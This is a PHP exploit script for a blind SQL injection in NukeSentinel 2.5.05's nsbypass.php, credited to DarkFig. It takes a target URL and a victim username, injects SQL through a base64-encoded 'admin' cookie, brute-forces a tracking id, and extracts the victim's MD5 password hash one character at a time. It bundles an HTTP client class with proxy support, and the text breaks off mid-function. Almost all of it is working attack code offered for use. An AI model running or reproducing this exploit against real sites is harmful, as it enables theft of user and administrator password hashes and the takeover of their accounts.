NukeSentinel 2.5.05 (nsbypass.php) Blind SQL Injection Exploit

#!/usr/bin/php <?php error_reporting(E_ALL&nbsp;^&nbsp;E_NOTICE); #&nbsp;(changes.txt) # #&nbsp;2.5.05&nbsp;CHANGES&nbsp;(2007-01-22): #&nbsp;+&nbsp;Includes&nbsp;IP2Country&nbsp;2007-01-19&nbsp;updated&nbsp;imports. #&nbsp;&nbsp;&nbsp;-&nbsp;Both&nbsp;data&nbsp;and&nbsp;sql&nbsp;versions.&nbsp;(Not&nbsp;in&nbsp;upgrade&nbsp;package) #&nbsp;+&nbsp;Moved&nbsp;nsbypass.php&nbsp;into&nbsp;the&nbsp;includes&nbsp;directory&nbsp;(Per&nbsp;User&nbsp;Requests). # #&nbsp;Prior&nbsp;versions&nbsp;may&nbsp;also&nbsp;be&nbsp;vulnerable&nbsp;but&nbsp;this&nbsp;exploit&nbsp;will&nbsp;not&nbsp;work #&nbsp;for&nbsp;these&nbsp;versions&nbsp;(because&nbsp;the&nbsp;file&nbsp;\'nsbypass.php\'&nbsp;is&nbsp;not&nbsp;into&nbsp;the #&nbsp;includes&nbsp;directory). # if($argc&nbsp;<&nbsp;5)&nbsp;{ print(\" &nbsp;&nbsp;NukeSentinel&nbsp;2.5.05&nbsp;(nsbypass.php)&nbsp;Blind&nbsp;SQL&nbsp;Injection&nbsp;Exploit ------------------------------------------------------------------ PHP&nbsp;conditions:&nbsp;none CMS&nbsp;conditions:&nbsp;disable_switch<=0&nbsp;(module&nbsp;activated),&nbsp;track_active=1 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Credits:&nbsp;DarkFig&nbsp;<gmdarkfig@gmail.com> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;URL:&nbsp;http://www.acid-root.new.fr/ ------------------------------------------------------------------ &nbsp;&nbsp;Usage:&nbsp;$argv[0]&nbsp;-url&nbsp;<url>&nbsp;-victim&nbsp;<username>&nbsp;[Opts] Options:&nbsp;-isadmin&nbsp;&nbsp;&nbsp;Is&nbsp;the&nbsp;victim&nbsp;an&nbsp;Admin&nbsp;(1)&nbsp;or&nbsp;a&nbsp;normal&nbsp;user&nbsp;(default=0)&nbsp;? &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-prefix&nbsp;&nbsp;&nbsp;&nbsp;Table&nbsp;prefix&nbsp;(default=nuke) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-tid&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;If&nbsp;you&nbsp;have&nbsp;already&nbsp;used&nbsp;this&nbsp;sploit &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-bf&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;You&nbsp;can&nbsp;precise&nbsp;how&nbsp;many&nbsp;hits&nbsp;we&nbsp;can&nbsp;try &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-proxy&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;If&nbsp;you&nbsp;wanna&nbsp;use&nbsp;a&nbsp;proxy&nbsp;<proxyhost:proxyport>&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-proxyauth&nbsp;Basic&nbsp;authentification&nbsp;<proxyuser:proxypwd>&nbsp; ------------------------------------------------------------------ \");&nbsp;exit(1); } $url&nbsp;&nbsp;&nbsp;=&nbsp;getparam(\'url\',1);&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;http://localhost/php-nuke-7.9/html/ $login&nbsp;=&nbsp;getparam(\'victim\',1);&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;Default&nbsp;&nbsp;&nbsp;#&nbsp;Victim&nbsp;(root&nbsp;for&nbsp;example) $admin&nbsp;=&nbsp;(getparam(\'isadmin\')!=\'\')&nbsp;?&nbsp;getparam(\'isadmin\')&nbsp;:&nbsp;0; $prfix&nbsp;=&nbsp;(getparam(\'prefix\')!=\'\')&nbsp;&nbsp;?&nbsp;getparam(\'prefix\')&nbsp;&nbsp;:&nbsp;\'nuke\'; $tid&nbsp;&nbsp;&nbsp;=&nbsp;(getparam(\'tid\')!=\'\')&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;?&nbsp;getparam(\'tid\')&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;0; $nbtst&nbsp;=&nbsp;(getparam(\'bf\')!=\'\')&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;?&nbsp;getparam(\'bf\')&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;10000; $proxy&nbsp;=&nbsp;getparam(\'proxy\'); $authp&nbsp;=&nbsp;getparam(\'proxyauth\'); $xpl&nbsp;=&nbsp;new&nbsp;phpsploit(); $xpl->agent(\"Mozilla&nbsp;Firefox\"); if($proxy)&nbsp;$xpl->proxy($proxy); if($authp)&nbsp;$xpl->proxyauth($authp); #&nbsp;+nukesentinel.php #&nbsp;49.&nbsp;&nbsp;if($ab_config[\'disable_switch\']&nbsp;>&nbsp;0)&nbsp;{&nbsp;return;&nbsp;} #&nbsp;414.&nbsp;if($ab_config[\'track_active\']&nbsp;==&nbsp;1&nbsp;AND&nbsp;!is_excluded($nsnst_const[\'remote_ip\']))&nbsp;{ #&nbsp;458.&nbsp;$db->sql_query(\"INSERT&nbsp;INTO&nbsp;`\".$prefix.\"_nsnst_tracked_ips`&nbsp;(`user_id`,&nbsp;`username`,&nbsp;`date`,&nbsp;`ip_addr`,&nbsp;`ip_long`,&nbsp;`page`, #&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;`user_agent`,&nbsp;`refered_from`,&nbsp;`x_forward_for`,&nbsp;`client_ip`,&nbsp;`remote_addr`,&nbsp;`remote_port`,&nbsp;`request_method`, #&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;`c2c`)&nbsp;VALUES&nbsp;(\'\".$nsnst_const[\'ban_user_id\'].\"\',&nbsp;\'$ban_username2\',&nbsp;\'\".$nsnst_const[\'ban_time\'].\"\',&nbsp; #&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\'\".$nsnst_const[\'remote_ip\'].\"\',&nbsp;\'\".$nsnst_const[\'remote_long\'].\"\',&nbsp;\'$pg\',&nbsp;\'$user_agent\',&nbsp;\'$refered_from\', #&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\'\".$nsnst_const[\'forward_ip\'].\"\',&nbsp;\'\".$nsnst_const[\'client_ip\'].\"\',&nbsp;\'\".$nsnst_const[\'remote_addr\'].\"\', #&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\'\".$nsnst_const[\'remote_port\'].\"\',&nbsp;\'\".$nsnst_const[\'request_method\'].\"\',&nbsp;\'$c2c\')\"); # #&nbsp;We&nbsp;insert&nbsp;a&nbsp;row&nbsp;in&nbsp;$prefix.\"_nsnst_tracked_ips\". # print&nbsp;\" Inserting&nbsp;a&nbsp;row&nbsp;in&nbsp;${prfix}_nsnst_tracked_ips\"; $xpl->addheader(\"Client-IP\",\"255.255.255.255\"); $xpl->get($url.\'index.php\'); #&nbsp;Trying&nbsp;to&nbsp;find&nbsp;a&nbsp;valid&nbsp;tid. #&nbsp;Needed&nbsp;for&nbsp;$tum&nbsp;>&nbsp;0. # print&nbsp;\" Trying&nbsp;to&nbsp;find&nbsp;a&nbsp;valid&nbsp;tid&nbsp;(max&nbsp;hits=$nbtst)\"; $sql&nbsp;=&nbsp;\"\'&nbsp;OR&nbsp;1=1#\"; $xpl->addcookie(\"admin\",urlencode(base64_encode($sql.\':1:\'))); for($c=$tid;$c<=$nbtst;$c++) { &nbsp;&nbsp;&nbsp;&nbsp;$xpl->get($url.\"includes/nsbypass.php?tid=$c\"); &nbsp;&nbsp;&nbsp;&nbsp;if(!preg_match(\"#phpnuke.org#\",$xpl->getheader())) &nbsp;&nbsp;&nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp; $tid&nbsp;=&nbsp;$c; &nbsp;&nbsp;&nbsp;&nbsp; print&nbsp;\" Valid&nbsp;tid&nbsp;found:&nbsp;$tid Hash:&nbsp;$login&nbsp;->&nbsp;\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break; &nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;if($c&nbsp;==&nbsp;$nbtst)&nbsp;exit(\" #1&nbsp;Exploit&nbsp;failed\"); } #&nbsp;MD5&nbsp;hash&nbsp;length&nbsp;[32] # for($a=1;$a<=32;$a++) { #&nbsp;MD5&nbsp;charset&nbsp;[a-f0-9] # for($b=48;$b<=71;$b++) { &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;+nsbypass.php #&nbsp;24.&nbsp;$num&nbsp;=&nbsp;$db->sql_numrows($db->sql_query(\"SELECT&nbsp;*&nbsp;FROM&nbsp;\".$prefix.\"_authors&nbsp;WHERE&nbsp;`aid`=\'$a_aid\'&nbsp;AND&nbsp;`pwd`=\'$a_pas\'\")); #&nbsp;25.&nbsp;$tum&nbsp;=&nbsp;$db->sql_numrows($db->sql_query(\"SELECT&nbsp;*&nbsp;FROM&nbsp;\".$prefix.\"_nsnst_tracked_ips&nbsp;WHERE&nbsp;`tid`=\'$tid\'\")); #&nbsp; if($admin)&nbsp;$sql&nbsp;=&nbsp;\"$login\'&nbsp;AND&nbsp;SUBSTR(pwd,$a,1)=CHAR($b)#\"; else&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$sql&nbsp;=&nbsp;\"\'&nbsp;OR&nbsp;SUBSTR((SELECT&nbsp;user_password&nbsp;FROM&nbsp;${prfix}_users&nbsp;WHERE&nbsp;username=\'$login\'),$a,1)=CHAR($b)#\"; #&nbsp;+nsbypass.php #&nbsp;16.&nbsp;$tid&nbsp;=&nbsp;intval($tid); #&nbsp;17.&nbsp;if(isset($_COOKIE[\'admin\'])&nbsp;&&&nbsp;!empty($_COOKIE[\'admin\']))&nbsp;{ #&nbsp;18.&nbsp;$abadmin&nbsp;=&nbsp;base64_decode($_COOKIE[\'admin\']); #&nbsp;19.&nbsp;$abadmin&nbsp;=&nbsp;explode(\":\",&nbsp;$abadmin); #&nbsp;20.&nbsp;$a_aid&nbsp;=&nbsp;\"$abadmin[0]\"; #&nbsp;21.&nbsp;$a_pas&nbsp;=&nbsp;\"$abadmin[1]\"; #&nbsp;22.&nbsp;} # $xpl->addcookie(\"admin\",urlencode(base64_encode($sql.\':1:\'))); $xpl->get($url.\"includes/nsbypass.php?tid=$tid\"); #&nbsp;+nsbypass.php #&nbsp;27.&nbsp;if($num&nbsp;>&nbsp;0&nbsp;AND&nbsp;$tum&nbsp;>&nbsp;0)&nbsp;{ #&nbsp;28.&nbsp;$row&nbsp;=&nbsp;$db->sql_fetchrow($db->sql_query(\"SELECT&nbsp;*&nbsp;FROM&nbsp;\".$prefix.\"_nsnst_tracked_ips&nbsp;WHERE&nbsp;`tid`=\'$tid\'\")); #&nbsp;29.&nbsp;$row[\'refered_from\']&nbsp;=&nbsp;html_entity_decode($row[\'refered_from\'],&nbsp;ENT_QUOTES); #&nbsp;30.&nbsp;header(\"Location:&nbsp;\".$row[\'refered_from\']); #&nbsp;31.&nbsp;}&nbsp;else&nbsp;{ #&nbsp;32.&nbsp;header(\"Location:&nbsp;\".$nuke_config[\'nukeurl\']); #&nbsp;33.&nbsp;} # if(!preg_match(\"#phpnuke.org#\",$xpl->getheader())) { print&nbsp;strtolower(chr($b)); break; } #&nbsp;MD5&nbsp;hash&nbsp;do&nbsp;not&nbsp;contains&nbsp;g&nbsp;(char(71))&nbsp;...&nbsp;WTF&nbsp;!? # if($b&nbsp;==&nbsp;71)&nbsp;exit(\" #2&nbsp;Exploit&nbsp;failed\"); } } #&nbsp;-url&nbsp;\"http://www.victim.com/\" #&nbsp;-url&nbsp;http://www.victim.com/ #&nbsp;getparam(\'url\',1) # function&nbsp;getparam($param,$opt=\'\') { global&nbsp;$argv; foreach($argv&nbsp;as&nbsp;$value&nbsp;=>&nbsp;$key) { if($key&nbsp;==&nbsp;\'-\'.$param)&nbsp;return&nbsp;$argv[$value+1]; } if($opt)&nbsp;exit(\" #3&nbsp;-$param&nbsp;parameter&nbsp;required\"); else&nbsp;return; } /* &nbsp;*&nbsp; &nbsp;*&nbsp;Copyright&nbsp;(C)&nbsp;darkfig &nbsp;*&nbsp; &nbsp;*&nbsp;This&nbsp;program&nbsp;is&nbsp;free&nbsp;software;&nbsp;you&nbsp;can&nbsp;redistribute&nbsp;it&nbsp;and/or&nbsp; &nbsp;*&nbsp;modify&nbsp;it&nbsp;under&nbsp;the&nbsp;terms&nbsp;of&nbsp;the&nbsp;GNU&nbsp;General&nbsp;Public&nbsp;License&nbsp; &nbsp;*&nbsp;as&nbsp;published&nbsp;by&nbsp;the&nbsp;Free&nbsp;Software&nbsp;Foundation;&nbsp;either&nbsp;version&nbsp;2&nbsp; &nbsp;*&nbsp;of&nbsp;the&nbsp;License,&nbsp;or&nbsp;(at&nbsp;your&nbsp;option)&nbsp;any&nbsp;later&nbsp;version.&nbsp; &nbsp;*&nbsp; &nbsp;*&nbsp;This&nbsp;program&nbsp;is&nbsp;distributed&nbsp;in&nbsp;the&nbsp;hope&nbsp;that&nbsp;it&nbsp;will&nbsp;be&nbsp;useful,&nbsp; &nbsp;*&nbsp;but&nbsp;WITHOUT&nbsp;ANY&nbsp;WARRANTY;&nbsp;without&nbsp;even&nbsp;the&nbsp;implied&nbsp;warranty&nbsp;of&nbsp; &nbsp;*&nbsp;MERCHANTABILITY&nbsp;or&nbsp;FITNESS&nbsp;FOR&nbsp;A&nbsp;PARTICULAR&nbsp;PURPOSE.&nbsp;&nbsp;See&nbsp;the&nbsp; &nbsp;*&nbsp;GNU&nbsp;General&nbsp;Public&nbsp;License&nbsp;for&nbsp;more&nbsp;details.&nbsp; &nbsp;*&nbsp; &nbsp;*&nbsp;You&nbsp;should&nbsp;have&nbsp;received&nbsp;a&nbsp;copy&nbsp;of&nbsp;the&nbsp;GNU&nbsp;General&nbsp;Public&nbsp;License&nbsp; &nbsp;*&nbsp;along&nbsp;with&nbsp;this&nbsp;program;&nbsp;if&nbsp;not,&nbsp;write&nbsp;to&nbsp;the&nbsp;Free&nbsp;Software&nbsp; &nbsp;*&nbsp;Foundation,&nbsp;Inc.,&nbsp;59&nbsp;Temple&nbsp;Place&nbsp;-&nbsp;Suite&nbsp;330,&nbsp;Boston,&nbsp;MA&nbsp;&nbsp;02111-1307,&nbsp;USA. &nbsp;*&nbsp; &nbsp;*&nbsp;TITLE:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;PhpSploit&nbsp;Class &nbsp;*&nbsp;REQUIREMENTS:&nbsp;&nbsp;&nbsp;PHP&nbsp;5&nbsp;(remove&nbsp;\"private\",&nbsp;\"public\"&nbsp;if&nbsp;you&nbsp;have&nbsp;PHP&nbsp;4) &nbsp;*&nbsp;VERSION:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1.2 &nbsp;*&nbsp;LICENSE:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;GNU&nbsp;General&nbsp;Public&nbsp;License &nbsp;*&nbsp;ORIGINAL&nbsp;URL:&nbsp;&nbsp;&nbsp;http://www.acid-root.new.fr/tools/03061230.txt &nbsp;*&nbsp;FILENAME:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;phpsploitclass.php &nbsp;* &nbsp;*&nbsp;CONTACT:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;gmdarkfig@gmail.com&nbsp;(french&nbsp;/&nbsp;english) &nbsp;*&nbsp;GREETZ:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Sparah,&nbsp;Ddx39 &nbsp;* &nbsp;*&nbsp;DESCRIPTION: &nbsp;*&nbsp;The&nbsp;phpsploit&nbsp;is&nbsp;a&nbsp;class&nbsp;implementing&nbsp;a&nbsp;web&nbsp;user&nbsp;agent. &nbsp;*&nbsp;You&nbsp;can&nbsp;add&nbsp;cookies,&nbsp;headers,&nbsp;use&nbsp;a&nbsp;proxy&nbsp;server&nbsp;with&nbsp;(or&nbsp;without)&nbsp;a &nbsp;*&nbsp;basic&nbsp;authentification.&nbsp;It&nbsp;supports&nbsp;the&nbsp;GET&nbsp;and&nbsp;the&nbsp;POST&nbsp;method.&nbsp;It&nbsp;can &nbsp;*&nbsp;also&nbsp;be&nbsp;used&nbsp;like&nbsp;a&nbsp;browser&nbsp;with&nbsp;the&nbsp;cookiejar()&nbsp;function&nbsp;(which&nbsp;allow &nbsp;*&nbsp;a&nbsp;server&nbsp;to&nbsp;add&nbsp;several&nbsp;cookies&nbsp;for&nbsp;the&nbsp;next&nbsp;requests)&nbsp;and&nbsp;the &nbsp;*&nbsp;allowredirection()&nbsp;function&nbsp;(which&nbsp;allow&nbsp;the&nbsp;script&nbsp;to&nbsp;follow&nbsp;all &nbsp;*&nbsp;redirections&nbsp;sent&nbsp;by&nbsp;the&nbsp;server).&nbsp;It&nbsp;can&nbsp;return&nbsp;the&nbsp;content&nbsp;(or&nbsp;the &nbsp;*&nbsp;headers)&nbsp;of&nbsp;the&nbsp;request.&nbsp;Others&nbsp;useful&nbsp;functions&nbsp;can&nbsp;be&nbsp;used&nbsp;for&nbsp;debugging. &nbsp;*&nbsp;A&nbsp;manual&nbsp;is&nbsp;actually&nbsp;in&nbsp;development&nbsp;but&nbsp;to&nbsp;know&nbsp;how&nbsp;to&nbsp;use&nbsp;it,&nbsp;you&nbsp;can &nbsp;*&nbsp;read&nbsp;the&nbsp;comments. &nbsp;* &nbsp;*&nbsp;CHANGELOG: &nbsp;*&nbsp;[2007-01-24]&nbsp;(1.2) &nbsp;*&nbsp;&nbsp;*&nbsp;Bug&nbsp;#2&nbsp;fixed:&nbsp;Problem&nbsp;concerning&nbsp;the&nbsp;getcookie()&nbsp;function&nbsp;((|;)) &nbsp;*&nbsp;&nbsp;*&nbsp;New:&nbsp;multipart/form-data&nbsp;enctype&nbsp;is&nbsp;now&nbsp;supported&nbsp; &nbsp;* &nbsp;*&nbsp;[2006-12-31]&nbsp;(1.1) &nbsp;*&nbsp;&nbsp;*&nbsp;Bug&nbsp;#1&nbsp;fixed:&nbsp;Problem&nbsp;concerning&nbsp;the&nbsp;allowredirection()&nbsp;function&nbsp;(chr(13)&nbsp;bug) &nbsp;*&nbsp;&nbsp;*&nbsp;New:&nbsp;You&nbsp;can&nbsp;now&nbsp;call&nbsp;the&nbsp;getheader()&nbsp;/&nbsp;getcontent()&nbsp;function&nbsp;without&nbsp;parameters &nbsp;* &nbsp;*&nbsp;[2006-12-30]&nbsp;(1.0) &nbsp;*&nbsp;&nbsp;*&nbsp;First&nbsp;version &nbsp;*&nbsp; &nbsp;*/ class&nbsp;phpsploit&nbsp;{ /** &nbsp;*&nbsp;This&nbsp;function&nbsp;is&nbsp;called&nbsp;by&nbsp;the&nbsp;get()/post()&nbsp;functions. &nbsp;*&nbsp;You&nbsp;don\'t&nbsp;have&nbsp;to&nbsp;call&nbsp;it,&nbsp;this&nbsp;is&nbsp;the&nbsp;main&nbsp;function. &nbsp;* &nbsp;*&nbsp;@return&nbsp;$server_response &nbsp;*/ private&nbsp;function&nbsp;sock() { if(!empty($this->proxyhost)&nbsp;&&&nbsp;!empty($this->proxyport))&nbsp;$socket&nbsp;=&nbsp;fsockopen($this->proxyhost,$this->proxyport); else&nbsp;$socket&nbsp;=&nbsp;fsockopen($this->host,$this->port); if(!$socket)&nbsp;die(\"Error:&nbsp;The&nbsp;host&nbsp;doesn\'t&nbsp;exist\"); if($this->method===\"get\")&nbsp;$this->packet&nbsp;=&nbsp;\"GET&nbsp;\".$this->url.\"&nbsp;HTTP/1.1 \"; elseif($this->method===\"post\"&nbsp;or&nbsp;$this->method===\"formdata\")&nbsp;$this->packet&nbsp;=&nbsp;\"POST&nbsp;\".$this->url.&nbsp;\"&nbsp;HTTP/1.1 \"; else&nbsp;die(\"Error:&nbsp;Invalid&nbsp;method\"); if(!empty($this->proxyuser))&nbsp;$this->packet&nbsp;.=&nbsp;\"Proxy-Authorization:&nbsp;Basic&nbsp;\".base64_encode($this->proxyuser.\":\".$this->proxypass).\" \"; $this->packet&nbsp;.=&nbsp;\"Host:&nbsp;\".$this->host.\" \"; if(!empty($this->agent))&nbsp;&nbsp;$this->packet&nbsp;.=&nbsp;\"User-Agent:&nbsp;\".$this->agent.\" \"; if(!empty($this->header))&nbsp;$this->packet&nbsp;.=&nbsp;$this->header.\" \"; if(!empty($this->cookie))&nbsp;$this->packet&nbsp;.=&nbsp;\"Cookie:&nbsp;\".$this->cookie.\" \"; $this->packet&nbsp;.=&nbsp;\"Connection:&nbsp;Close \"; if($this->method===\"post\") { $this->packet&nbsp;.=&nbsp;\"Content-Type:&nbsp;application/x-www-form-urlencoded \"; $this->packet&nbsp;.=&nbsp;\"Content-Length:&nbsp;\".strlen($this->data).\" \"; $this->packet&nbsp;.=&nbsp;$this->data.\" \"; } elseif($this->method===\"formdata\") { $this->packet&nbsp;.=&nbsp;\"Content-Type:&nbsp;multipart/form-data;&nbsp;boundary=---------------------------\".$this->boundary.\" \"; $this->packet&nbsp;.=&nbsp;\"Content-Length:&nbsp;\".strlen($this->data).\" \"; $this->packet&nbsp;.=&nbsp;$this->data; } $this->packet&nbsp;.=&nbsp;\" \"; $this->recv&nbsp;=&nbsp;\'\'; fputs($socket,$this->packet); while(!feof($socket))&nbsp;$this->recv&nbsp;.=&nbsp;fgets($socket); fclose($socket); if($this->cookiejar)&nbsp;$this->cookiejar($this->getheader($this->recv)); if($this->allowredirection)&nbsp;return&nbsp;$this->allowredirection($this->recv); else&nbsp;return&nbsp;$this->recv; } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;allows&nbsp;you&nbsp;to&nbsp;add&nbsp;several&nbsp;cookie&nbsp;in&nbsp;the &nbsp;*&nbsp;request.&nbsp;Several&nbsp;methods&nbsp;are&nbsp;supported: &nbsp;*&nbsp; &nbsp;*&nbsp;$this->addcookie(\"name\",\"value\"); &nbsp;*&nbsp;or &nbsp;*&nbsp;$this->addcookie(\"name=newvalue\"); &nbsp;*&nbsp;or &nbsp;*&nbsp;$this->addcookie(\"othername=overvalue;&nbsp;xx=zz;&nbsp;y=u\"); &nbsp;*&nbsp; &nbsp;*&nbsp;@param&nbsp;string&nbsp;$cookiename &nbsp;*&nbsp;@param&nbsp;string&nbsp;$cookievalue &nbsp;*&nbsp; &nbsp;*/ public&nbsp;function&nbsp;addcookie($cookn,$cookv=\'\') { //&nbsp;$this->addcookie(\"name\",\"value\");&nbsp;work&nbsp;avec&nbsp;replace if(!empty($cookv)) { if($cookv&nbsp;===&nbsp;\"deleted\")&nbsp;$cookv=\'\';&nbsp;//&nbsp;cookiejar(1)&nbsp;&&&nbsp;Set-Cookie:&nbsp;name=delete if(!empty($this->cookie)) { &nbsp;&nbsp;&nbsp;&nbsp;if(preg_match(\"/$cookn=/\",$this->cookie)) &nbsp;&nbsp;&nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp; $this->cookie&nbsp;=&nbsp;preg_replace(\"/$cookn=(S*);/\",\"$cookn=$cookv;\",$this->cookie); &nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;else &nbsp;&nbsp;&nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp; $this->cookie&nbsp;.=&nbsp;\"&nbsp;\".$cookn.\"=\".$cookv.\";\";&nbsp;//&nbsp;\"&nbsp;\". &nbsp;&nbsp;&nbsp;&nbsp;} } else { $this->cookie&nbsp;=&nbsp;$cookn.\"=\".$cookv.\";\"; } } //&nbsp;$this->addcookie(\"name=value;&nbsp;othername=othervalue\"); else { &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;if(!empty($this->cookie)) &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp; &nbsp; $cookn&nbsp;=&nbsp;preg_replace(\"/(.*);$/\",\"$1\",$cookn); &nbsp;&nbsp;&nbsp;&nbsp; &nbsp; $cookarr&nbsp;=&nbsp;explode(\";\",str_replace(\"&nbsp;\",&nbsp;\"\",$cookn)); &nbsp;&nbsp;&nbsp;&nbsp; &nbsp; for($i=0;$i<count($cookarr);$i++) &nbsp;&nbsp;&nbsp;&nbsp; &nbsp; { &nbsp;&nbsp;&nbsp;&nbsp; &nbsp; preg_match(\"/(S*)=(S*)/\",$cookarr[$i],$matches); &nbsp;&nbsp;&nbsp;&nbsp; &nbsp; $cookn&nbsp;=&nbsp;$matches[1]; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp; $cookv&nbsp;=&nbsp;$matches[2]; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp; $this->addcookie($cookn,$cookv); &nbsp;&nbsp;&nbsp;&nbsp; &nbsp; } &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;} &nbsp;else &nbsp;{ &nbsp; $cookn&nbsp;=&nbsp;((substr($cookn,(strlen($cookn)-1),1))===\";\")&nbsp;?&nbsp;$cookn&nbsp;:&nbsp;$cookn.\";\"; &nbsp; $this->cookie&nbsp;=&nbsp;$cookn; &nbsp;} } } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;allows&nbsp;you&nbsp;to&nbsp;add&nbsp;several&nbsp;headers&nbsp;in&nbsp;the &nbsp;*&nbsp;request.&nbsp;Several&nbsp;methods&nbsp;are&nbsp;supported: &nbsp;* &nbsp;*&nbsp;$this->addheader(\"headername\",\"headervalue\"); &nbsp;*&nbsp;or &nbsp;*&nbsp;$this->addheader(\"headername:&nbsp;headervalue\"); &nbsp;* &nbsp;*&nbsp;@param&nbsp;string&nbsp;$headername &nbsp;*&nbsp;@param&nbsp;string&nbsp;$headervalue &nbsp;*/ public&nbsp;function&nbsp;addheader($headern,$headervalue=\'\') { //&nbsp;$this->addheader(\"name\",\"value\"); if(!empty($headervalue)) { if(!empty($this->header)) { if(preg_match(\"/$headern:/\",$this->header)) { $this->header&nbsp;=&nbsp;preg_replace(\"/$headern:&nbsp;(S*)/\",\"$headern:&nbsp;$headervalue\",$this->header); } else { $this->header&nbsp;.=&nbsp;\" \".$headern.\":&nbsp;\".$headervalue; } } else { $this->header=$headern.\":&nbsp;\".$headervalue; } } //&nbsp;$this->addheader(\"name:&nbsp;value\"); else&nbsp; { if(!empty($this->header)) { $headarr&nbsp;=&nbsp;explode(\":&nbsp;\",$headern); $headern&nbsp;=&nbsp;$headarr[0]; $headerv&nbsp;=&nbsp;$headarr[1]; $this->addheader($headern,$headerv); } else { $this->header=$headern; } } } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;allows&nbsp;you&nbsp;to&nbsp;use&nbsp;an&nbsp;http&nbsp;proxy&nbsp;server. &nbsp;*&nbsp;Several&nbsp;methods&nbsp;are&nbsp;supported: &nbsp;*&nbsp; &nbsp;*&nbsp;$this->proxy(\"proxyip\",\"8118\"); &nbsp;*&nbsp;or &nbsp;*&nbsp;$this->proxy(\"proxyip:8118\") &nbsp;* &nbsp;*&nbsp;@param&nbsp;string&nbsp;$proxyhost &nbsp;*&nbsp;@param&nbsp;integer&nbsp;$proxyport &nbsp;*/ public&nbsp;function&nbsp;proxy($proxy,$proxyp=\'\') { 